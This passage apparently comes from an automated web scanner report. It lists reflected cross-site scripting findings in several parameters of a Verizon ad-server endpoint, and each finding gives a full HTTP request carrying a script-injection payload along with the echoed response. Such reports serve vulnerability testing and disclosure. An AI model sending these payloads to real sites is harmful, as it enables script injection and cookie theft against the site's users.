Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:00:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
435909697/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=f781c"><script>alert(1)</script>a57011b3662&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhos
...[SNIP]...

2.472. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popindicator parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cea2"><script>alert(1)</script>ebd3c538844 was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=7cea2"><script>alert(1)</script>ebd3c538844&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:59:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1383124824/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=7cea2"><script>alert(1)</script>ebd3c538844&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_b
...[SNIP]...

2.473. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c32d2"><script>alert(1)</script>8cd62dcfc46 was submitted in the popip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218c32d2"><script>alert(1)</script>8cd62dcfc46&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:59:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ne.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1849526581/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218c32d2"><script>alert(1)</script>8cd62dcfc46&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=
...[SNIP]...

2.474. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popservice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d4e8"><script>alert(1)</script>c094da35e2f was submitted in the popservice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=1d4e8"><script>alert(1)</script>c094da35e2f&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:00:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
p/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=1d4e8"><script>alert(1)</script>c094da35e2f&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&
...[SNIP]...

2.475. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popstate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9935"><script>alert(1)</script>c0d1b7995e5 was submitted in the popstate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=c9935"><script>alert(1)</script>c0d1b7995e5&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:59:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
s/vzsurround2.net/homepage/L24/164258786/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=c9935"><script>alert(1)</script>c0d1b7995e5&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&
...[SNIP]...

2.476. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popzipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 414f2"><script>alert(1)</script>cc49defb4ff was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=414f2"><script>alert(1)</script>cc49defb4ff&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:59:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
.net/homepage/L24/1316221898/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=414f2"><script>alert(1)</script>cc49defb4ff&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail
...[SNIP]...

2.477. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [prizm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6379c"><script>alert(1)</script>36add4502da was submitted in the prizm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=6379c"><script>alert(1)</script>36add4502da&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:01:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
A_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=6379c"><script>alert(1)</script>36add4502da&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&we
...[SNIP]...

2.478. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [pts parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e69e6"><script>alert(1)</script>b0cfdbb05e7 was submitted in the pts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=e69e6"><script>alert(1)</script>b0cfdbb05e7&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:04:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ndicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=e69e6"><script>alert(1)</script>b0cfdbb05e7&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.479. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [pws parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 926c4"><script>alert(1)</script>47726e5a653 was submitted in the pws parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=926c4"><script>alert(1)</script>47726e5a653&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:03:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=926c4"><script>alert(1)</script>47726e5a653&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.480. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed11"><script>alert(1)</script>099568b5dd9 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=bed11"><script>alert(1)</script>099568b5dd9 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(document.cookies)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 23:07:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
artner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=bed11"><script>alert(1)</script>099568b5dd9" target="_top">
...[SNIP]...

2.481. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [sec_email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top

Issue detail

The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1674e"><script>alert(1)</script>44173c41208 was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

